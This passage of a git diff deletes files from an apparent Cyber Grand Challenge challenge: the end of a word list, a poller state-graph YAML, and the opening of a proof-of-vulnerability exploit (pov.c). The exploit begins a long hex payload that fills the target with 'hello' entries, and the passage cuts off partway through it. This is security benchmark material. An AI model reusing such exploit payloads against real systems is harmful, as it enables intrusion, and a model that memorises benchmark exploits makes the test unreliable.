"example", - "divulge", - "flyswatter", - "enforce", - "ice-cold", - "acronym", - "forgetful", - "block", - "burnt", - "HQ", - "glow", - "coffee shop", - "Anglican", - "county", - "league", - "local time", - "caterpillar", - "cantankerous", - "astonishingly", - "against", - "honeysuckle", - "martyrdom", - "cheerful", - "elfin", - "hairsplitting", - "dry-clean", - "irrelevant", - "couch potato", - "general", - "gift", - "coaster", - "disinterest", - "croquet", - "cerebral", - "Britain", - "garden", - "fast", - "interjection", - "continued", - "congestion", - "critique", - "archaic", - "inquiry", - "abstain", - "bombed", - "dimple", - "hood", - "extensive", - "disk jockey", - "aggressively", - "demotion", - "great-grandson", - "john", - "earring", - "hazelnut", - "flamboyant", - "lib", - "enlistment", - "marital status", - "biweekly", - "interchangeably", - "fixture", - "aspiring", - "fogy", - "autocracy", - "bra", - "garbage", - "impending", - "marketability", - "indistinguishable", - "cadence", - "January", - "greenery", - "hunk", - "enliven", - "buoyancy", - "implementation", - "joyously", - "bottom line", - "difficult", - "lifesaver", - "enumerate", - "ft.", - "hot chocolate", - "left wing", - "bide", - "hillbilly", - "accompaniment", - "blue blood", - "hoarse", - "goose bumps", - "evaporate", - "loaves", - "helplessly", - "drug addict", - "clergyman", - "dissertation", - "comeback", - "genera", - "grouchy", - "bristle", - "calculating", - "intercede", - "cuticle", - "generically", - "disaffected", - "invitation", - "excellently", - "devastating", - "conspiracy", - "acknowledgment", - "bearable", - "bathrobe", - "arthritic", - "drier", - "apple cider", - "forearm", - "dis", - "entail", - "hewn", - "fire hydrant", - "haystack", - "bag", - "Lutheran", - "centenary", - "grace", - "daydreamer", - "getup", - "cameo", - "cheek", - "havoc", - "inter", - "carbohydrate", - "announcement", - "latch", - "glassy", - "Jesus", - "Internet", - "immunization", - "doctrine", - "aspirin", - "fulfilled", - "loathsome", - "electric shock", - "dump", - "infiltrate", - "harmonica", - "lamb", - "barn", - "earnest", - "locate", - "genitalia", - "enterprise", - "fickle", - "leaves", - "go", - "amazed", - "caravan", - "ID", - "discount store", - "defecate", - "junction", - "federalism", - "maniac", - "chopsticks", - "booking", - "intonation", - "basis", - "definite article", - "inattentive", - "filter", - "confess", - "captivity", - "childbirth", - "bawl", - "forbore", - "checked", - "grumble", - "maliciously", - "expressively", - "hyperactivity", - "magnificently", - "hidden", - "interloper", - "full house", - "fed", - "good old boy", - "dissect", - "forcible", - "mall", - "cooking", - "daybreak", - "grandson", - "anesthetic", - "illegitimacy", - "documentation", - "abuse", - "hammock", - "exhaustive", - "eyelid", - "handbag", - "directions", - "flabbergasted", - "exhibition", - "bunk bed", - "fissure", - "indistinct", - "forcefully", - "deference", - "jaunty", - "ineptitude", - "anthropologist", - "inhabitant", - "death row", - "forth", - "alternation", - "glacier", - "coals", - "disqualify", - "cuisine", - "approbation", - "marshy", - "facility", - "flock", - "apron", - "counterpart", - "bootlegger", - "building", - "canned", - "kangaroo", - "epigram", - "accompanist", - "husky", - "inward", - "bald", - "highbrow", - "bandit", - "convex", - "bases", - "colonial", - "gingerbread", - "bray", - "fighter", - "cod", - "black", - "last name", - "entomology", - "honor", - "god-awful", - "cheers", - "cuteness", - "a la mode", - "gall", - "foreword", - "boat people", - "apprentice", - "herald", - "arcade", - "lovers", - "house arrest", - "boutique", - "eradicate", - "disease", - "err", - "deplore", - "compute", - "dial", - "life span", - "horseshoes", - "enforceable", - "cockpit", - "immaturity", - "admirable", - "afterthought", - "irrepressible", - "delete", - "club soda", - "grad", - "abstinent", - "keep", - "aviator", - "listen", - "disenfranchise", - "dissent", - "flashlight", - "coincidental", - "hands-off", - "alumnae", - "disagree", - "desirable", - "inadequacy", - "intercom", - "hymn", - "concoct", - "inheritance", - "consolidate", - "countryside", - "art", - "caucus", - "amphitheater", - "frighteningly", - "catapult", - "headache", - "downstream", - "downtime", - "gentile", - "heathen", - "lastly", - "cooperate", - "bloodhound", - "majestically", - "imp", - "appointment", - "lug", - "decimal", - "coexistence", - "dated", - "inn", - "cactus", - "jangle", - "daub", - "extinguish", - "harem", - "contaminate", - "congregate", - "historian", - "elements", - "chick", - "customer", - "discreet", - "individualistic", - "exterminate", - "chord", - "installation", - "air", - "conflict of interest", - "fiction", - "hornet", - "laboriously", - "debrief", - "foam", - "lovingly", - "discipline", - "absurdly", - "Coca-Cola", - "comforting", - "hotbed", - "idiotically", - "convenient", - "conciliation", - "hundredth", - "cancel", - "audiovisual", - "escaped", - "capitulation", - "guesstimate", - "dejection", - "droppings", - "basin", - "flotilla", - "acclimation", - "congress", - "formative", - "colonialism", - "formulation", - "callously", - "form", - "list", - "bluish", - "checkmate", - "embalm", - "envious", - "lyrical", - "allure", - "dusty", - "coordination", - "ambivalence", - "eczema", - "auction", - "mannish", - "bacteria", - "disoriented", - "abortive", - "bargaining chip", - "dirt", - "brush-off", - "margin of error", - "disproportionate", - "apathy", - "aboveboard", - "knocker", - "B.S.", - "climax", - "discussion", - "apologize", - "equivalence", - "illness", - "archaeology", - "hijacking", - "condensation", - "lollipop", - "grandeur", - "lookalike", - "glacial", - "intellect", - "later", - "Atlantic Ocean", - "excuse", - "low", - "horrific", - "doorway", - "homosexual", - "hot flash", - "jacket", - "disparate", - "common-law wife", - "incendiary", - "bugle", - "hairdo", - "haywire", - "liqueur", - "bazaar", - "hypnotize", - "calculate", - "adoration", - "dorsal", - "advantage", - "enormous", - "beveled", - "fleshy", - "bisection", - "convent", - "greeting", - "detonate", - "mailbox", - "eloquently", - "eventual", - "blissful", - "duchess", - "aria", - "group", - "huddle", - "impudence", - "baseball", - "eunuch", - "esthetically", - "good-bye", - "illiteracy", - "inessential", - "lexicon", - "hospitalize", - "jump", - "busily", - "managerial", - "gargle", - "knead", - "chloroform", - "magic", - "finale", - "fragrance", - "feline", - "childish", - "brawn", - "ceaselessly", - "banal", - "lite", - "cul-de-sac", - "greenhorn", - "bring", - "dislocation", - "high-grade", - "galley", - "ballad", - "connotation", - "eternal", - "inquest", - "AWOL", - "heart attack", - "appointed", - "malaise", - "gradually", - "burner", - "blackbird", - "cholesterol", - "advancement", - "institution", - "induce", - "e", - "douse", - "glib", - "inaction", - "copper", - "enduring", - "hothead", - "drum", - "farmyard", - "hay fever", - "engage", - "head count", - "mane", - "lick", - "further", - "deface", - "imagery", - "hot-tempered", - "inauguration", - "cannibalism", - "ambition", - "district", - "manger", - "decorate", - "ethical", - "eavesdropper", - "badger", - "freethinker", - "certifiable", - "collapsible", - "animated", - "electrocution", - "embarrassingly", - "Greek", - "jellyfish", - "equestrian", - "discourse", - "instantaneous", - "depravity", - "bait", - "inexplicable", - "boiling point", - "diagonal", - "glitzy", - "hard-working", - "adrenaline", - "befallen", - "herbivore", - "cold", - "inception", - "major-league", - "crutch", - "indices", - "conduct", - "industrialization", - "doz.", - "carousel", - "expect", - "cutting", - "capitalist", - "bandage", - "hopefully", - "investment", - "geology", - "coop", - "befell", - "forked", - "grease", - "annexation", - "kindergarten", - "boomerang", - "belatedly", - "hypertension", - "encompass", - "caught", - "goddamned", - "conference", - "heading", - "ecstasy", - "listener", - "dairy", - "degradation", - "experienced", - "barometric", - "glass ceiling", - "evenness", - "current", - "jinx", - "celebrated", - "immigrate", - "cut", - "autograph", - "diversion", - "kayak", - "feces", - "icon", - "eel", - "maim", - "bowl", - "fearlessly", - "assumption", - "awful", - "habitable", - "bearded", - "double-talk", - "insoluble", - "celery", - "criticize", - "enlighten", - "autobiographical", - "due process", - "cold-blooded", - "boyhood", - "extort", - "expropriate", - "humorist", - "benign", - "fender-bender", - "extol", - "chamber", - "euphemism", - "investor", - "cultivated", - "infest", - "fl. oz.", - "desolation", - "illustrate", - "life-threatening", - "audit", - "bloodshot", - "cynical", - "activist", - "Fri.", - "cheaply", - "gritty", - "deformity", - "Confederate", - "bimonthly", - "bundle", - "fire engine", - "aerosol", - "chauvinist", - "encyclopedia", - "devil", - "crisis", - "fondly", - "infrared", - "elongated", - "insubordinate", - "doghouse", - "hideously", - "blacken", - "child", - "appreciatively", - "imperfection", - "cross", - "butte", - "contemptible", - "imprisonment", - "from", - "fear", - "hamburger", - "DC", - "deprived", - "gosling", - "companionable", - "immobility", - "lust", - "clapper", - "eh", - "induct", - "limit", - "blabbermouth", - "boulder", - "categorize", - "expensive", - "CIA", - "ballistics", - "chairman", - "buoyantly", - "distracted", - "debut", - "epileptic", - "disuse", - "commotion", - "abusive", - "dispensable", - "lozenge", - "campaign", - "drizzle", - "footbridge", - "confident", - "clothesline", - "lettuce", - "empathize", - "kidney bean", - "cesarean section", - "conjure", - "elitist", - "drape", - "eligible", - "hag", - "bidding", - "funky", - "evangelist", - "hazel", - "birdseed", - "crackle", - "glad", - "lounge", - "experience", - "counterfeiter", - "dopey", - "attache case", - "impediment", - "halo", - "hacksaw", - "extremist", - "foul ball", - "flaccid", - "ammonia", - "hexagon", - "documentary", - "guarantor", - "interpersonal", - "gore", - "defiance", - "balloon", - "herd", - "fatalism", - "dash", - "exporter", - "light-headed", - "dust", - "alkaline", - "base", - "cautiously", - "conscience", - "ferociously", - "hackneyed", - "itemize", - "bran", - "consider", - "candle", - "chimpanzee", - "fruity", - "frustrating", - "flow", - "aggravation", - "hydraulics", - "abstinence", - "folk music", - "gossip", - "great", - "dandy", - "feminist", - "flophouse", - "dubious", - "disapproving", - "fire department", - "gotta", - "did", - "legal-size", - "cassette", - "crowbar", - "don't", - "heard", - "access", - "giddy", - "decent", - "amateur", - "chuckle", - "keg", - "condiment", - "low-key", - "figuratively", - "blubber", - "homeopathy", - "candidly", - "chintz", - "aural", - "given", - "male chauvinist", - "homeward", - "executive", - "locker", - "bookmaker", - "force-feed", - "beater", - "bottleneck", - "exhume", - "hang gliding", - "auditorium", - "framework", - "lynch", - "childlike", -] diff --git a/challenges/FUN/poller/for-testing/state-graph.yaml b/challenges/FUN/poller/for-testing/state-graph.yaml deleted file mode 100644 index b0a0da042..000000000 --- a/challenges/FUN/poller/for-testing/state-graph.yaml +++ /dev/null @@ -1,44 +0,0 @@ ---- -nodes: -- name: start -- name: menu1 -- name: do_reprotect1 -- name: do_add_word1 -- name: do_search1 -- name: do_generate1 -- name: do_training1 -- name: do_sort -- name: menu2 -- name: do_reprotect2 -- name: do_add_word2 -- name: do_search2 -- name: do_generate2 -- name: do_training2 -- name: end - -edges: -- start: menu1 -- menu1: do_reprotect1 -- menu1: do_add_word1 -- menu1: do_search1 -- menu1: do_generate1 -- menu1: do_training1 -- menu1: do_sort -- do_reprotect1: menu1 -- do_add_word1: menu1 -- do_search1: menu1 -- do_generate1: menu1 -- do_training1: menu1 -- do_sort: menu2 -- menu2: do_reprotect2 -- menu2: do_add_word2 -- menu2: do_search2 -- menu2: do_generate2 -- menu2: do_training2 -- menu2: end - weight: 0.05 -- do_reprotect2: menu2 -- do_add_word2: menu2 -- do_search2: menu2 -- do_generate2: menu2 -- do_training2: menu2 diff --git a/challenges/FUN/pov_1/pov.c b/challenges/FUN/pov_1/pov.c deleted file mode 100644 index cd36ba128..000000000 --- a/challenges/FUN/pov_1/pov.c +++ /dev/null @@ -1,2259 +0,0 @@ -#include "libpov.h" -int main(int cgc_argc, char *cgc_argv[]) { - cgc_negotiate_type1(0x0, 0x0, 0); - do { - //*** writing data - static unsigned char write_00000_00000[] = - "\x0a\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f\x30\xff\x43\x26" - "\x46\x38\x06\x68\x65\x6c\x6c\x6f\x31\xff\x43\x26\x46\x38\x06\x68" - "\x65\x6c\x6c\x6f\x32\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f" - "\x33\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f\x34\xff\x43\x26" - "\x46\x38\x06\x68\x65\x6c\x6c\x6f\x35\xff\x43\x26\x46\x38\x06\x68" - "\x65\x6c\x6c\x6f\x36\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f" - "\x37\xff\x43\x26\x46\x38\x06\x68\x65\x6c\x6c\x6f\x38\xff\x43\x26" - "\x46\x38\x06\x68\x65\x6c\x6c\x6f\x39\xff\x43\x26\x46\x38\x07\x68" - "\x65\x6c\x6c\x6f\x31\x30\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" - "\x6f\x31\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x32" - "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x33\xff\x43\x26" - "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x34\xff\x43\x26\x46\x38\x07" - "\x68\x65\x6c\x6c\x6f\x31\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c" - "\x6c\x6f\x31\x36\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31" - "\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x38\xff\x43" - "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x31\x39\xff\x43\x26\x46\x38" - "\x07\x68\x65\x6c\x6c\x6f\x32\x30\xff\x43\x26\x46\x38\x07\x68\x65" - "\x6c\x6c\x6f\x32\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" - "\x32\x32\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x32\x33\xff" - "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x32\x34\xff\x43\x26\x46" - "\x38\x07\x68\x65\x6c\x6c\x6f\x32\x35\xff\x43\x26\x46\x38\x07\x68" - "\x65\x6c\x6c\x6f\x32\x36\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" - "\x6f\x32\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x32\x38" - "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x32\x39\xff\x43\x26" - "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33\x30\xff\x43\x26\x46\x38\x07" - "\x68\x65\x6c\x6c\x6f\x33\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c" - "\x6c\x6f\x33\x32\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33" - "\x33\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33\x34\xff\x43" - "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33\x35\xff\x43\x26\x46\x38" - "\x07\x68\x65\x6c\x6c\x6f\x33\x36\xff\x43\x26\x46\x38\x07\x68\x65" - "\x6c\x6c\x6f\x33\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" - "\x33\x38\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x33\x39\xff" - "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34\x30\xff\x43\x26\x46" - "\x38\x07\x68\x65\x6c\x6c\x6f\x34\x31\xff\x43\x26\x46\x38\x07\x68" - "\x65\x6c\x6c\x6f\x34\x32\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" - "\x6f\x34\x33\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34\x34" - "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34\x35\xff\x43\x26" - "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34\x36\xff\x43\x26\x46\x38\x07" - "\x68\x65\x6c\x6c\x6f\x34\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c" - "\x6c\x6f\x34\x38\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x34" - "\x39\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x35\x30\xff\x43" - "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x35\x31\xff\x43\x26\x46\x38" - "\x07\x68\x65\x6c\x6c\x6f\x35\x32\xff\x43\x26\x46\x38\x07\x68\x65" - "\x6c\x6c\x6f\x35\x33\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" - "\x35\x34\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x35\x35\xff" - "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x35\x36\xff\x43\x26\x46" - "\x38\x07\x68\x65\x6c\x6c\x6f\x35\x37\xff\x43\x26\x46\x38\x07\x68" - "\x65\x6c\x6c\x6f\x35\x38\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" - "\x6f\x35\x39\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x30" - "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x31\xff\x43\x26" - "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x32\xff\x43\x26\x46\x38\x07" - "\x68\x65\x6c\x6c\x6f\x36\x33\xff\x43\x26\x46\x38\x07\x68\x65\x6c" - "\x6c\x6f\x36\x34\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36" - "\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x36\xff\x43" - "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x36\x37\xff\x43\x26\x46\x38" - "\x07\x68\x65\x6c\x6c\x6f\x36\x38\xff\x43\x26\x46\x38\x07\x68\x65" - "\x6c\x6c\x6f\x36\x39\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" - "\x37\x30\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x31\xff" - "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x32\xff\x43\x26\x46" - "\x38\x07\x68\x65\x6c\x6c\x6f\x37\x33\xff\x43\x26\x46\x38\x07\x68" - "\x65\x6c\x6c\x6f\x37\x34\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" - "\x6f\x37\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x36" - "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x37\xff\x43\x26" - "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x37\x38\xff\x43\x26\x46\x38\x07" - "\x68\x65\x6c\x6c\x6f\x37\x39\xff\x43\x26\x46\x38\x07\x68\x65\x6c" - "\x6c\x6f\x38\x30\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38" - "\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38\x32\xff\x43" - "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38\x33\xff\x43\x26\x46\x38" - "\x07\x68\x65\x6c\x6c\x6f\x38\x34\xff\x43\x26\x46\x38\x07\x68\x65" - "\x6c\x6c\x6f\x38\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f" - "\x38\x36\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38\x37\xff" - "\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x38\x38\xff\x43\x26\x46" - "\x38\x07\x68\x65\x6c\x6c\x6f\x38\x39\xff\x43\x26\x46\x38\x07\x68" - "\x65\x6c\x6c\x6f\x39\x30\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c" - "\x6f\x39\x31\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x32" - "\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x33\xff\x43\x26" - "\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x34\xff\x43\x26\x46\x38\x07" - "\x68\x65\x6c\x6c\x6f\x39\x35\xff\x43\x26\x46\x38\x07\x68\x65\x6c" - "\x6c\x6f\x39\x36\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39" - "\x37\xff\x43\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x38\xff\x43" - "\x26\x46\x38\x07\x68\x65\x6c\x6c\x6f\x39\x39\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x30\x30\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x30\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x30\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x30\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x30" - "\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x30\x35\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x30\x36\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x30\x37\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x30\x38\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x30\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x31\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x31\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x31" - "\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x31\x33\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x31\x34\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x31\x35\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x31\x36\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x31\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x31\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x31\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32" - "\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32\x31\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32\x32\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32\x33\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x32\x34\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x32\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x32\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x32\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32" - "\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x32\x39\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x30\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x31\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x33\x32\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x33\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x33\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x33\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33" - "\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x37\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x38\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x33\x39\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x34\x30\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x34\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x34\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x34\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x34" - "\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x34\x35\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x34\x36\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x34\x37\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x34\x38\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x34\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x35\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x35\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x35" - "\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x35\x33\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x35\x34\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x35\x35\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x35\x36\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x35\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x35\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x35\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36" - "\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36\x31\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36\x32\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36\x33\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x36\x34\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x36\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x36\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x36\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36" - "\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x36\x39\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x30\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x31\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x37\x32\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x37\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x37\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x37\x35\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37" - "\x36\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x37\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x38\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x37\x39\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x38\x30\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x38\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x38\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x38\x33\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x38" - "\x34\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x38\x35\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x38\x36\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x38\x37\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x38\x38\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x38\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x39\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x39\x31\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x39" - "\x32\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x39\x33\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x39\x34\xff\x43\x26" - "\x46\x38\x08\x68\x65\x6c\x6c\x6f\x31\x39\x35\xff\x43\x26\x46\x38" - "\x08\x68\x65\x6c\x6c\x6f\x31\x39\x36\xff\x43\x26\x46\x38\x08\x68" - "\x65\x6c\x6c\x6f\x31\x39\x37\xff\x43\x26\x46\x38\x08\x68\x65\x6c" - "\x6c\x6f\x31\x39\x38\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f" - "\x31\x39\x39\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x30" - "\x30\xff\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x30\x31\xff" - "\x43\x26\x46\x38\x08\x68\x65\x6c\x6c\x6f\x32\x30\x32\xff\x43\x26" - 